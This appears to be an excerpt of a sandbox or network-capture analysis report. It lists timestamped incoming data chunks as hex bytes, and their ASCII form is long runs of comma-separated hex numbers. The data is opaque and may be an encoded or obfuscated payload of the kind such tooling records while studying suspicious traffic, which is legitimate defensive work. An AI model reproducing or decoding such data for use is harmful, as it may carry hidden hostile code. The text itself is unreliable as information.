                                                    2023-11-04 00:30:16 UTC20INData Raw: 31 2c 65 65 2c 31 31 39 2c 31 32 36 2c 34 33 2c 33 34 2c 33 32 2c 31 30 32 2c 31 32 63 2c 65 33 2c 31 31 36 2c 31 33 37 2c 65 65 2c 39 35 2c 62 39 2c 31 31 62 2c 31 35 63 2c 34 33 2c 34 66 2c 33 31 2c 31 34 35 2c 31 33 63 2c 63 66 2c 31 31 34 2c 63 66 2c 31 34 62 2c 31 33 32 2c 31 32 38 2c 31 34 30 2c 35 30 2c 31 30 35 2c 31 34 63 2c 31 31 61 2c 61 30 2c 31 31 34 2c 61 61 2c 31 34 32 2c 35 31 2c 64 38 2c 34 31 2c 35 31 2c 36 33 2c 31 34 63 2c 31 33 62 2c 31 34 66 2c 31 31 63 2c 66 39 2c 66 66 2c 64 66 2c 38 39 2c 31 34 36 2c 31 30 39 2c 31 34 35 2c 31 34 36 2c 38 65 2c 31 31 33 2c 31 33 61 2c 38 37 2c 64 62 2c 31 33 31 2c 31 30 31 2c 33 38 2c 34 34 2c 37 34 2c 31 35 31 2c 31 34 34 2c 35 61 2c 31 34 36 2c 31 33 61 2c 31 30 34 2c 37 38 2c 31 33 38 2c 31 33
                                                    Data Ascii: 1,ee,119,126,43,34,32,102,12c,e3,116,137,ee,95,b9,11b,15c,43,4f,31,145,13c,cf,114,cf,14b,132,128,140,50,105,14c,11a,a0,114,aa,142,51,d8,41,51,63,14c,13b,14f,11c,f9,ff,df,89,146,109,145,146,8e,113,13a,87,db,131,101,38,44,74,151,144,5a,146,13a,104,78,138,13
                                                    2023-11-04 00:30:16 UTC21INData Raw: 34 37 2c 31 31 35 2c 61 35 2c 39 36 2c 39 34 2c 63 64 2c 31 30 36 2c 31 31 62 2c 66 64 2c 31 31 61 2c 31 33 38 2c 31 31 38 2c 31 31 65 2c 31 33 37 2c 31 32 30 2c 31 32 36 2c 31 33 33 2c 31 32 65 2c 31 30 34 2c 39 39 2c 66 66 2c 31 34 36 2c 66 38 2c 39 30 2c 37 66 2c 39 33 2c 39 63 2c 33 32 2c 31 30 31 2c 39 32 2c 36 33 2c 31 33 64 2c 31 33 34 2c 31 35 35 2c 31 34 35 2c 31 33 37 2c 62 63 2c 31 33 34 2c 34 62 2c 61 63 2c 66 34 2c 31 31 61 2c 31 33 38 2c 31 31 38 2c 31 31 65 2c 31 33 37 2c 31 32 30 2c 31 32 36 2c 31 33 33 2c 31 32 65 2c 31 30 34 2c 39 39 2c 66 66 2c 31 34 36 2c 63 61 2c 31 30 65 2c 31 34 33 2c 31 30 66 2c 31 30 30 2c 66 65 2c 31 30 64 2c 31 31 64 2c 31 32 66 2c 31 32 31 2c 31 33 31 2c 31 32 34 2c 31 31 32 2c 38 64 2c 63 34 2c 31 35 63 2c 39
                                                    Data Ascii: 47,115,a5,96,94,cd,106,11b,fd,11a,138,118,11e,137,120,126,133,12e,104,99,ff,146,f8,90,7f,93,9c,32,101,92,63,13d,134,155,145,137,bc,134,4b,ac,f4,11a,138,118,11e,137,120,126,133,12e,104,99,ff,146,ca,10e,143,10f,100,fe,10d,11d,12f,121,131,124,112,8d,c4,15c,9
                                                    2023-11-04 00:30:16 UTC23INData Raw: 34 65 2c 63 38 2c 34 37 2c 62 64 2c 38 37 2c 31 30 31 2c 64 34 2c 31 34 66 2c 35 64 2c 31 34 32 2c 39 64 2c 34 65 2c 31 31 35 2c 35 35 2c 39 34 2c 63 65 2c 39 34 2c 66 35 2c 64 39 2c 37 34 2c 64 37 2c 61 37 2c 31 32 66 2c 35 37 2c 61 62 2c 36 62 2c 65 64 2c 31 30 32 2c 31 32 63 2c 66 66 2c 36 33 2c 36 64 2c 34 62 2c 38 36 2c 66 39 2c 66 34 2c 38 32 2c 63 63 2c 39 65 2c 31 32 33 2c 61 36 2c 66 30 2c 61 64 2c 31 30 61 2c 63 33 2c 33 62 2c 66 62 2c 39 30 2c 31 31 33 2c 33 34 2c 39 36 2c 37 30 2c 31 33 34 2c 35 35 2c 36 66 2c 35 34 2c 35 61 2c 62 37 2c 65 66 2c 38 35 2c 31 31 38 2c 31 35 63 2c 64 34 2c 37 38 2c 34 62 2c 37 37 2c 63 65 2c 37 63 2c 33 36 2c 39 32 2c 64 63 2c 37 33 2c 61 37 2c 66 32 2c 39 64 2c 31 31 32 2c 38 38 2c 63 34 2c 62 64 2c 31 32 33 2c
                                                    Data Ascii: 4e,c8,47,bd,87,101,d4,14f,5d,142,9d,4e,115,55,94,ce,94,f5,d9,74,d7,a7,12f,57,ab,6b,ed,102,12c,ff,63,6d,4b,86,f9,f4,82,cc,9e,123,a6,f0,ad,10a,c3,3b,fb,90,113,34,96,70,134,55,6f,54,5a,b7,ef,85,118,15c,d4,78,4b,77,ce,7c,36,92,dc,73,a7,f2,9d,112,88,c4,bd,123,
                                                    2023-11-04 00:30:16 UTC24INData Raw: 34 2c 36 64 2c 34 62 2c 37 37 2c 63 65 2c 37 39 2c 33 61 2c 63 63 2c 31 33 36 2c 63 30 2c 31 31 37 2c 36 39 2c 35 38 2c 31 31 32 2c 38 64 2c 63 34 2c 31 35 63 2c 39 34 2c 64 38 2c 37 65 2c 31 34 61 2c 66 37 2c 39 31 2c 31 34 65 2c 66 36 2c 61 31 2c 36 32 2c 66 32 2c 37 33 2c 63 31 2c 35 34 2c 66 66 2c 39 66 2c 31 36 39 2c 64 36 2c 37 66 2c 31 32 62 2c 34 39 2c 33 32 2c 34 31 2c 35 31 2c 65 65 2c 39 61 2c 31 36 31 2c 65 33 2c 31 32 62 2c 39 35 2c 66 62 2c 37 34 2c 34 33 2c 31 31 62 2c 66 64 2c 31 31 61 2c 31 33 38 2c 31 31 38 2c 31 31 65 2c 31 33 37 2c 31 32 30 2c 31 32 36 2c 31 33 33 2c 31 32 65 2c 31 30 34 2c 39 39 2c 66 66 2c 31 34 36 2c 66 30 2c 31 33 37 2c 37 66 2c 63 63 2c 38 31 2c 31 32 61 2c 61 62 2c 35 31 2c 66 30 2c 61 32 2c 31 36 31 2c 31 34 30
                                                    Data Ascii: 4,6d,4b,77,ce,79,3a,cc,136,c0,117,69,58,112,8d,c4,15c,94,d8,7e,14a,f7,91,14e,f6,a1,62,f2,73,c1,54,ff,9f,169,d6,7f,12b,49,32,41,51,ee,9a,161,e3,12b,95,fb,74,43,11b,fd,11a,138,118,11e,137,120,126,133,12e,104,99,ff,146,f0,137,7f,cc,81,12a,ab,51,f0,a2,161,140
                                                    2023-11-04 00:30:16 UTC25INData Raw: 34 37 2c 64 38 2c 31 33 34 2c 62 37 2c 31 33 30 2c 31 31 37 2c 31 34 33 2c 31 30 66 2c 31 30 30 2c 66 65 2c 31 30 64 2c 31 31 64 2c 31 32 66 2c 31 32 31 2c 31 33 31 2c 31 32 34 2c 31 31 32 2c 38 64 2c 63 34 2c 31 35 63 2c 63 36 2c 31 31 37 2c 31 33 30 2c 61 62 2c 31 32 66 2c 31 31 38 2c 31 31 65 2c 31 33 37 2c 31 32 30 2c 31 32 36 2c 31 33 33 2c 31 32 65 2c 31 30 34 2c 39 39 2c 66 66 2c 31 34 36 2c 66 30 2c 31 33 37 2c 37 66 2c 63 63 2c 38 31 2c 31 32 61 2c 31 30 38 2c 39 36 2c 31 35 66 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 63 33 2c 37 65 2c 31 36 38 2c 63 65 2c 35 37 2c 62 63 2c 61 33 2c 31 36 34 2c 34 66 2c 61 33 2c 36 66 2c 64 66 2c 31 32 34 2c 31 34 66 2c 62 30 2c 33 38 2c 34 34 2c 37 34 2c 36 39 2c 31 32 33 2c 31 30 62 2c 66 63 2c 31 30 33 2c 61 39
                                                    Data Ascii: 47,d8,134,b7,130,117,143,10f,100,fe,10d,11d,12f,121,131,124,112,8d,c4,15c,c6,117,130,ab,12f,118,11e,137,120,126,133,12e,104,99,ff,146,f0,137,7f,cc,81,12a,108,96,15f,55,65,58,46,c3,7e,168,ce,57,bc,a3,164,4f,a3,6f,df,124,14f,b0,38,44,74,69,123,10b,fc,103,a9
                                                    2023-11-04 00:30:16 UTC27INData Raw: 35 30 2c 64 31 2c 37 61 2c 33 64 2c 66 39 2c 38 38 2c 31 34 62 2c 62 34 2c 63 62 2c 37 38 2c 34 63 2c 63 38 2c 38 34 2c 64 66 2c 61 37 2c 37 33 2c 62 33 2c 63 33 2c 39 39 2c 31 37 30 2c 61 63 2c 64 37 2c 35 62 2c 31 30 32 2c 38 38 2c 31 32 63 2c 62 35 2c 31 30 31 2c 35 35 2c 62 33 2c 31 33 64 2c 61 34 2c 36 62 2c 34 36 2c 33 38 2c 62 63 2c 31 33 34 2c 35 33 2c 64 61 2c 37 65 2c 31 34 36 2c 66 37 2c 39 64 2c 36 61 2c 65 65 2c 31 31 36 2c 35 62 2c 62 39 2c 65 64 2c 37 64 2c 31 34 30 2c 63 34 2c 65 35 2c 62 61 2c 31 34 33 2c 31 35 66 2c 38 39 2c 33 64 2c 33 32 2c 34 31 2c 64 63 2c 62 30 2c 31 34 64 2c 31 32 63 2c 39 39 2c 35 65 2c 34 37 2c 33 39 2c 37 30 2c 34 33 2c 64 61 2c 38 36 2c 35 61 2c 62 65 2c 64 37 2c 39 66 2c 31 36 33 2c 31 33 63 2c 35 61 2c 36 66
                                                    Data Ascii: 50,d1,7a,3d,f9,88,14b,b4,cb,78,4c,c8,84,df,a7,73,b3,c3,99,170,ac,d7,5b,102,88,12c,b5,101,55,b3,13d,a4,6b,46,38,bc,134,53,da,7e,146,f7,9d,6a,ee,116,5b,b9,ed,7d,140,c4,e5,ba,143,15f,89,3d,32,41,dc,b0,14d,12c,99,5e,47,39,70,43,da,86,5a,be,d7,9f,163,13c,5a,6f
                                                    2023-11-04 00:30:16 UTC28INData Raw: 37 33 2c 36 34 2c 35 35 2c 36 35 2c 63 30 2c 38 65 2c 36 34 2c 37 62 2c 37 30 2c 64 30 2c 39 34 2c 63 35 2c 39 65 2c 31 35 34 2c 36 62 2c 61 66 2c 36 62 2c 35 34 2c 65 37 2c 66 34 2c 64 61 2c 31 33 37 2c 31 34 33 2c 31 37 33 2c 31 34 32 2c 31 31 36 2c 31 34 33 2c 31 37 36 2c 31 34 32 2c 31 31 66 2c 37 30 2c 61 39 2c 31 34 39 2c 31 36 31 2c 39 36 2c 36 35 2c 65 35 2c 64 33 2c 36 63 2c 31 33 38 2c 31 36 66 2c 31 34 32 2c 31 33 37 2c 38 38 2c 31 34 36 2c 31 36 62 2c 31 34 62 2c 64 66 2c 66 38 2c 38 38 2c 31 35 39 2c 31 36 36 2c 31 36 31 2c 38 39 2c 64 31 2c 31 30 31 2c 61 61 2c 31 36 63 2c 31 34 61 2c 31 37 36 2c 31 32 62 2c 31 31 39 2c 33 32 2c 34 31 2c 35 31 2c 63 62 2c 39 64 2c 39 31 2c 39 61 2c 34 36 2c 63 35 2c 63 65 2c 63 30 2c 31 34 32 2c 31 34 65 2c
                                                    Data Ascii: 73,64,55,65,c0,8e,64,7b,70,d0,94,c5,9e,154,6b,af,6b,54,e7,f4,da,137,143,173,142,116,143,176,142,11f,70,a9,149,161,96,65,e5,d3,6c,138,16f,142,137,88,146,16b,14b,df,f8,88,159,166,161,89,d1,101,aa,16c,14a,176,12b,119,32,41,51,cb,9d,91,9a,46,c5,ce,c0,142,14e,
                                                    2023-11-04 00:30:16 UTC29INData Raw: 36 2c 61 33 2c 33 38 2c 63 66 2c 63 31 2c 31 35 36 2c 31 35 35 2c 61 33 2c 31 37 36 2c 31 34 32 2c 31 33 33 2c 62 64 2c 31 32 36 2c 61 65 2c 31 32 36 2c 31 32 31 2c 31 33 31 2c 31 32 34 2c 31 31 32 2c 38 64 2c 63 34 2c 31 35 63 2c 39 34 2c 64 38 2c 37 65 2c 31 34 61 2c 66 37 2c 39 39 2c 31 34 65 2c 31 35 33 2c 31 32 35 2c 31 35 39 2c 31 36 36 2c 31 36 31 2c 63 33 2c 38 39 2c 37 63 2c 64 64 2c 31 34 64 2c 34 63 2c 65 62 2c 34 66 2c 62 66 2c 37 66 2c 31 33 64 2c 61 32 2c 31 34 62 2c 65 63 2c 63 32 2c 35 38 2c 34 36 2c 62 62 2c 66 64 2c 37 34 2c 63 65 2c 39 34 2c 31 32 64 2c 64 39 2c 31 35 31 2c 61 39 2c 31 31 34 2c 36 66 2c 35 34 2c 31 32 36 2c 31 33 33 2c 31 32 65 2c 31 30 34 2c 39 39 2c 66 66 2c 31 34 36 2c 62 65 2c 64 34 2c 63 34 2c 31 33 66 2c 62 66 2c
                                                    Data Ascii: 6,a3,38,cf,c1,156,155,a3,176,142,133,bd,126,ae,126,121,131,124,112,8d,c4,15c,94,d8,7e,14a,f7,99,14e,153,125,159,166,161,c3,89,7c,dd,14d,4c,eb,4f,bf,7f,13d,a2,14b,ec,c2,58,46,bb,fd,74,ce,94,12d,d9,151,a9,114,6f,54,126,133,12e,104,99,ff,146,be,d4,c4,13f,bf,
                                                    2023-11-04 00:30:16 UTC31INData Raw: 39 31 2c 35 61 2c 62 62 2c 64 66 2c 61 37 2c 31 36 33 2c 31 34 61 2c 64 35 2c 34 38 2c 37 34 2c 35 61 2c 66 38 2c 39 30 2c 31 37 33 2c 63 65 2c 31 31 39 2c 38 66 2c 31 30 33 2c 35 35 2c 36 33 2c 31 32 31 2c 31 33 31 2c 31 32 34 2c 31 31 32 2c 38 64 2c 63 34 2c 31 35 63 2c 39 34 2c 64 38 2c 37 65 2c 31 34 61 2c 66 37 2c 39 31 2c 31 34 65 2c 66 35 2c 39 34 2c 38 61 2c 66 32 2c 31 34 37 2c 39 35 2c 31 30 37 2c 31 34 30 2c 31 32 36 2c 31 33 39 2c 31 31 37 2c 31 34 33 2c 31 30 66 2c 31 30 30 2c 66 65 2c 31 30 64 2c 31 31 64 2c 31 32 66 2c 31 32 31 2c 31 33 31 2c 31 32 34 2c 31 31 32 2c 38 64 2c 63 34 2c 31 35 63 2c 39 34 2c 64 38 2c 37 65 2c 31 34 61 2c 66 37 2c 39 31 2c 31 34 65 2c 66 36 2c 36 34 2c 65 35 2c 62 34 2c 31 35 65 2c 63 33 2c 38 36 2c 61 34 2c 31
                                                    Data Ascii: 91,5a,bb,df,a7,163,14a,d5,48,74,5a,f8,90,173,ce,119,8f,103,55,63,121,131,124,112,8d,c4,15c,94,d8,7e,14a,f7,91,14e,f5,94,8a,f2,147,95,107,140,126,139,117,143,10f,100,fe,10d,11d,12f,121,131,124,112,8d,c4,15c,94,d8,7e,14a,f7,91,14e,f6,64,e5,b4,15e,c3,86,a4,1
                                                    2023-11-04 00:30:16 UTC32INData Raw: 2c 31 35 63 2c 39 34 2c 64 38 2c 37 65 2c 31 34 61 2c 31 35 34 2c 61 30 2c 39 61 2c 36 62 2c 35 34 2c 36 39 2c 31 31 64 2c 31 32 32 2c 62 64 2c 31 30 34 2c 65 39 2c 36 34 2c 66 38 2c 39 38 2c 31 37 33 2c 63 65 2c 33 64 2c 31 31 61 2c 36 34 2c 35 34 2c 36 33 2c 35 35 2c 66 30 2c 61 35 2c 31 34 32 2c 31 32 30 2c 63 34 2c 37 34 2c 34 33 2c 34 66 2c 62 63 2c 31 33 33 2c 63 39 2c 31 30 66 2c 31 31 65 2c 31 33 37 2c 31 32 30 2c 31 32 36 2c 31 33 33 2c 31 32 65 2c 31 30 34 2c 39 39 2c 66 66 2c 31 34 36 2c 62 65 2c 64 34 2c 63 34 2c 31 33 66 2c 62 66 2c 37 37 2c 31 33 64 2c 64 62 2c 61 33 2c 35 39 2c 66 30 2c 31 33 64 2c 61 33 2c 66 62 2c 31 30 35 2c 31 33 63 2c 31 30 66 2c 31 31 62 2c 66 64 2c 31 31 61 2c 31 33 38 2c 31 31 38 2c 31 31 65 2c 31 33 37 2c 31 32 30
                                                    Data Ascii: ,15c,94,d8,7e,14a,154,a0,9a,6b,54,69,11d,122,bd,104,e9,64,f8,98,173,ce,3d,11a,64,54,63,55,f0,a5,142,120,c4,74,43,4f,bc,133,c9,10f,11e,137,120,126,133,12e,104,99,ff,146,be,d4,c4,13f,bf,77,13d,db,a3,59,f0,13d,a3,fb,105,13c,10f,11b,fd,11a,138,118,11e,137,120
                                                    2023-11-04 00:30:16 UTC33INData Raw: 33 63 2c 62 35 2c 34 66 2c 39 66 2c 62 63 2c 61 33 2c 31 36 34 2c 64 37 2c 39 34 2c 38 33 2c 37 66 2c 39 66 2c 36 66 2c 62 32 2c 63 33 2c 39 31 2c 31 36 63 2c 31 34 32 2c 39 36 2c 34 63 2c 37 37 2c 34 33 2c 33 37 2c 37 37 2c 34 39 2c 61 31 2c 31 34 62 2c 63 35 2c 37 30 2c 35 38 2c 34 36 2c 62 62 2c 66 64 2c 38 30 2c 63 65 2c 39 63 2c 31 32 39 2c 64 39 2c 62 64 2c 36 30 2c 37 64 2c 63 30 2c 36 30 2c 65 33 2c 62 63 2c 31 35 65 2c 63 33 2c 38 39 2c 31 37 30 2c 61 61 2c 66 38 2c 39 38 2c 31 36 66 2c 31 32 62 2c 34 39 2c 33 32 2c 34 31 2c 35 31 2c 65 65 2c 39 61 2c 31 35 64 2c 65 33 2c 31 32 62 2c 39 35 2c 66 62 2c 37 38 2c 34 33 2c 31 31 62 2c 66 64 2c 31 31 61 2c 31 33 38 2c 31 31 38 2c 31 31 65 2c 31 33 37 2c 31 32 30 2c 31 32 36 2c 31 33 33 2c 31 32 65 2c
                                                    Data Ascii: 3c,b5,4f,9f,bc,a3,164,d7,94,83,7f,9f,6f,b2,c3,91,16c,142,96,4c,77,43,37,77,49,a1,14b,c5,70,58,46,bb,fd,80,ce,9c,129,d9,bd,60,7d,c0,60,e3,bc,15e,c3,89,170,aa,f8,98,16f,12b,49,32,41,51,ee,9a,15d,e3,12b,95,fb,78,43,11b,fd,11a,138,118,11e,137,120,126,133,12e,
                                                    2023-11-04 00:30:16 UTC35INData Raw: 2c 31 32 34 2c 31 31 32 2c 38 64 2c 63 34 2c 31 35 63 2c 61 64 2c 31 34 65 2c 39 39 2c 38 65 2c 31 31 62 2c 38 64 2c 35 32 2c 63 66 2c 66 35 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 39 34 2c 64 38 2c 65 33 2c 39 32 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 38 33 2c 39 32 2c 61 34 2c 62 39 2c 61 63 2c 65 65 2c 62 64 2c 31 33 36 2c 63 31 2c 38 36 2c 31 35 63 2c 31 30 61 2c 39 34 2c 31 32 64 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 66 36 2c 39 39 2c 31 34 36 2c 66 32 2c 36 61 2c 63 33 2c 39 39 2c 31 36 30 2c 35 64 2c 62 65 2c 34 66 2c 31 30 32 2c 31 30 64 2c 31 31 63 2c 36 36 2c 34 31 2c 35 31 2c 36 33 2c 64 38 2c 31 34 35 2c 35 61 2c 62 61 2c 34 30 2c 63 34 2c 62 64 2c 31 32 66 2c 31 33 37 2c 64 38 2c 31 34 32 2c 31 36 62 2c 31 34 62 2c 31 33 64 2c 37 38 2c 31 31
                                                    Data Ascii: ,124,112,8d,c4,15c,ad,14e,99,8e,11b,8d,52,cf,f5,5a,67,62,38,94,d8,e3,92,4b,77,43,34,83,92,a4,b9,ac,ee,bd,136,c1,86,15c,10a,94,12d,4e,6c,4c,52,f6,99,146,f2,6a,c3,99,160,5d,be,4f,102,10d,11c,66,41,51,63,d8,145,5a,ba,40,c4,bd,12f,137,d8,142,16b,14b,13d,78,11
                                                    2023-11-04 00:30:16 UTC36INData Raw: 31 33 64 2c 64 63 2c 36 62 2c 65 30 2c 37 36 2c 65 33 2c 38 62 2c 31 33 34 2c 63 34 2c 37 38 2c 34 36 2c 39 39 2c 33 35 2c 31 33 36 2c 62 31 2c 31 34 30 2c 31 35 31 2c 31 36 61 2c 64 39 2c 31 31 61 2c 64 62 2c 37 64 2c 63 33 2c 39 31 2c 31 37 30 2c 65 35 2c 37 65 2c 64 36 2c 37 39 2c 63 65 2c 38 31 2c 31 32 65 2c 63 63 2c 35 61 2c 36 36 2c 39 64 2c 36 39 2c 31 34 30 2c 37 33 2c 31 32 63 2c 31 33 38 2c 31 36 66 2c 63 65 2c 31 31 37 2c 31 31 39 2c 35 34 2c 36 63 2c 34 63 2c 35 32 2c 66 36 2c 31 33 39 2c 62 37 2c 31 32 61 2c 31 32 65 2c 31 30 34 2c 39 39 2c 66 66 2c 31 34 36 2c 62 65 2c 64 34 2c 63 34 2c 31 33 66 2c 62 66 2c 37 66 2c 31 33 64 2c 64 34 2c 31 32 34 2c 35 39 2c 31 34 64 2c 66 35 2c 38 39 2c 33 38 2c 33 39 2c 66 62 2c 31 32 38 2c 61 63 2c 66 34
                                                    Data Ascii: 13d,dc,6b,e0,76,e3,8b,134,c4,78,46,99,35,136,b1,140,151,16a,d9,11a,db,7d,c3,91,170,e5,7e,d6,79,ce,81,12e,cc,5a,66,9d,69,140,73,12c,138,16f,ce,117,119,54,6c,4c,52,f6,139,b7,12a,12e,104,99,ff,146,be,d4,c4,13f,bf,7f,13d,d4,124,59,14d,f5,89,38,39,fb,128,ac,f4
                                                    2023-11-04 00:30:16 UTC37INData Raw: 35 39 2c 31 36 63 2c 31 34 61 2c 31 37 36 2c 63 36 2c 62 31 2c 33 65 2c 34 31 2c 63 37 2c 38 33 2c 65 30 2c 61 61 2c 36 34 2c 39 36 2c 63 33 2c 38 36 2c 31 35 34 2c 31 32 62 2c 63 37 2c 31 32 64 2c 31 34 64 2c 31 36 62 2c 39 63 2c 64 64 2c 62 38 2c 31 33 63 2c 64 64 2c 31 32 38 2c 36 33 2c 38 39 2c 63 66 2c 63 39 2c 31 34 36 2c 62 66 2c 31 33 33 2c 66 65 2c 34 39 2c 33 34 2c 33 32 2c 63 34 2c 31 31 35 2c 37 33 2c 62 66 2c 36 35 2c 63 32 2c 34 37 2c 63 33 2c 38 36 2c 31 35 34 2c 31 32 62 2c 31 34 37 2c 31 32 33 2c 31 34 64 2c 31 36 62 2c 64 37 2c 39 37 2c 31 34 66 2c 64 66 2c 61 37 2c 31 35 33 2c 65 62 2c 38 30 2c 34 38 2c 66 66 2c 61 66 2c 31 35 31 2c 64 36 2c 62 63 2c 31 32 62 2c 62 64 2c 37 34 2c 35 39 2c 64 63 2c 62 30 2c 36 31 2c 62 36 2c 65 33 2c 39
                                                    Data Ascii: 59,16c,14a,176,c6,b1,3e,41,c7,83,e0,aa,64,96,c3,86,154,12b,c7,12d,14d,16b,9c,dd,b8,13c,dd,128,63,89,cf,c9,146,bf,133,fe,49,34,32,c4,115,73,bf,65,c2,47,c3,86,154,12b,147,123,14d,16b,d7,97,14f,df,a7,153,eb,80,48,ff,af,151,d6,bc,12b,bd,74,59,dc,b0,61,b6,e3,9
                                                    2023-11-04 00:30:16 UTC39INData Raw: 32 2c 61 66 2c 34 38 2c 39 35 2c 66 66 2c 61 37 2c 31 36 35 2c 31 33 33 2c 31 35 65 2c 31 33 64 2c 31 33 33 2c 31 33 31 2c 34 34 2c 39 36 2c 36 62 2c 61 35 2c 31 34 64 2c 61 36 2c 34 36 2c 33 38 2c 33 39 2c 66 33 2c 31 30 37 2c 35 62 2c 62 61 2c 39 33 2c 31 36 38 2c 63 66 2c 63 66 2c 31 36 37 2c 35 34 2c 63 65 2c 36 66 2c 65 64 2c 38 64 2c 31 34 30 2c 66 64 2c 61 66 2c 31 35 64 2c 31 33 36 2c 39 63 2c 63 65 2c 37 39 2c 33 65 2c 37 63 2c 39 36 2c 37 37 2c 63 38 2c 36 65 2c 31 31 66 2c 38 62 2c 31 32 34 2c 31 33 38 2c 31 36 66 2c 31 34 32 2c 31 34 65 2c 31 31 63 2c 35 63 2c 66 37 2c 39 39 2c 35 65 2c 39 65 2c 31 32 36 2c 39 35 2c 62 34 2c 37 36 2c 34 37 2c 64 39 2c 31 33 36 2c 65 33 2c 63 32 2c 31 33 37 2c 31 30 32 2c 38 38 2c 31 32 30 2c 62 62 2c 38 36 2c
                                                    Data Ascii: 2,af,48,95,ff,a7,165,133,15e,13d,133,131,44,96,6b,a5,14d,a6,46,38,39,f3,107,5b,ba,93,168,cf,cf,167,54,ce,6f,ed,8d,140,fd,af,15d,136,9c,ce,79,3e,7c,96,77,c8,6e,11f,8b,124,138,16f,142,14e,11c,5c,f7,99,5e,9e,126,95,b4,76,47,d9,136,e3,c2,137,102,88,120,bb,86,
                                                    2023-11-04 00:30:16 UTC40INData Raw: 63 2c 65 35 2c 37 38 2c 65 64 2c 38 35 2c 34 63 2c 37 37 2c 61 34 2c 37 31 2c 31 33 33 2c 65 65 2c 31 33 32 2c 31 33 33 2c 31 33 31 2c 63 63 2c 31 31 39 2c 31 34 62 2c 37 35 2c 31 35 61 2c 31 35 37 2c 31 34 35 2c 63 31 2c 37 65 2c 31 34 38 2c 31 32 62 2c 63 37 2c 31 31 66 2c 31 34 64 2c 31 36 62 2c 64 35 2c 39 37 2c 31 33 66 2c 65 31 2c 39 66 2c 31 33 66 2c 62 32 2c 63 35 2c 39 31 2c 31 34 38 2c 61 62 2c 31 35 35 2c 39 33 2c 31 36 35 2c 31 34 32 2c 31 33 33 2c 62 35 2c 31 30 35 2c 35 39 2c 37 32 2c 31 30 62 2c 31 33 35 2c 64 64 2c 31 31 38 2c 61 63 2c 34 34 2c 66 62 2c 38 38 2c 31 33 62 2c 62 34 2c 31 31 36 2c 37 30 2c 64 35 2c 39 37 2c 31 35 37 2c 31 33 66 2c 35 63 2c 31 35 32 2c 66 39 2c 62 62 2c 63 31 2c 31 36 30 2c 35 61 2c 65 32 2c 37 61 2c 31 30 32
                                                    Data Ascii: c,e5,78,ed,85,4c,77,a4,71,133,ee,132,133,131,cc,119,14b,75,15a,157,145,c1,7e,148,12b,c7,11f,14d,16b,d5,97,13f,e1,9f,13f,b2,c5,91,148,ab,155,93,165,142,133,b5,105,59,72,10b,135,dd,118,ac,44,fb,88,13b,b4,116,70,d5,97,157,13f,5c,152,f9,bb,c1,160,5a,e2,7a,102
                                                    2023-11-04 00:30:16 UTC41INData Raw: 35 2c 31 33 35 2c 66 62 2c 39 38 2c 31 34 37 2c 62 63 2c 39 33 2c 37 34 2c 64 35 2c 39 34 2c 38 33 2c 64 66 2c 39 66 2c 31 36 33 2c 65 64 2c 31 31 64 2c 61 31 2c 31 33 36 2c 35 65 2c 36 64 2c 31 31 37 2c 31 34 33 2c 31 30 66 2c 31 30 30 2c 66 65 2c 31 30 64 2c 31 31 64 2c 31 32 66 2c 31 32 31 2c 31 33 31 2c 31 32 34 2c 31 31 32 2c 38 64 2c 63 34 2c 31 35 63 2c 63 36 2c 31 33 62 2c 35 35 2c 62 38 2c 36 63 2c 64 39 2c 39 66 2c 31 35 66 2c 31 33 63 2c 31 32 36 2c 61 31 2c 36 32 2c 33 38 2c 65 35 2c 64 34 2c 31 31 64 2c 62 34 2c 34 62 2c 31 30 30 2c 38 38 2c 31 32 34 2c 65 62 2c 61 39 2c 31 31 34 2c 61 61 2c 35 35 2c 31 34 64 2c 66 36 2c 34 36 2c 33 38 2c 33 39 2c 66 39 2c 38 38 2c 31 34 37 2c 62 63 2c 39 62 2c 31 36 34 2c 39 64 2c 64 64 2c 62 38 2c 35 63 2c
                                                    Data Ascii: 5,135,fb,98,147,bc,93,74,d5,94,83,df,9f,163,ed,11d,a1,136,5e,6d,117,143,10f,100,fe,10d,11d,12f,121,131,124,112,8d,c4,15c,c6,13b,55,b8,6c,d9,9f,15f,13c,126,a1,62,38,e5,d4,11d,b4,4b,100,88,124,eb,a9,114,aa,55,14d,f6,46,38,39,f9,88,147,bc,9b,164,9d,dd,b8,5c,
                                                    2023-11-04 00:30:16 UTC43INData Raw: 39 35 2c 31 34 33 2c 37 34 2c 31 32 30 2c 62 39 2c 61 63 2c 34 33 2c 34 66 2c 62 61 2c 39 33 2c 31 36 34 2c 64 37 2c 39 37 2c 31 36 33 2c 64 66 2c 61 37 2c 36 66 2c 39 64 2c 38 30 2c 35 30 2c 65 37 2c 36 62 2c 66 38 2c 61 30 2c 31 36 66 2c 63 65 2c 37 36 2c 33 61 2c 63 63 2c 39 65 2c 36 62 2c 65 30 2c 37 39 2c 65 30 2c 63 66 2c 38 64 2c 31 32 35 2c 31 35 62 2c 34 61 2c 31 31 36 2c 37 36 2c 31 33 61 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 64 66 2c 39 66 2c 31 35 33 2c 65 64 2c 31 31 64 2c 61 31 2c 31 33 36 2c 35 65 2c 36 64 2c 31 31 37 2c 31 34 33 2c 31 30 66 2c 31 30 30 2c 66 65 2c 31 30 64 2c 31 31 64 2c 31 32 66 2c 31 32 31 2c 31 33 31 2c 31 32 34 2c 31 31 32 2c 38 64 2c 63 34 2c 31 35 63 2c 39 34 2c 31 33 37 2c 31 31 38 2c 37 31 2c 36 63 2c 34 63 2c 64
                                                    Data Ascii: 95,143,74,120,b9,ac,43,4f,ba,93,164,d7,97,163,df,a7,6f,9d,80,50,e7,6b,f8,a0,16f,ce,76,3a,cc,9e,6b,e0,79,e0,cf,8d,125,15b,4a,116,76,13a,6c,4c,52,6b,df,9f,153,ed,11d,a1,136,5e,6d,117,143,10f,100,fe,10d,11d,12f,121,131,124,112,8d,c4,15c,94,137,118,71,6c,4c,d
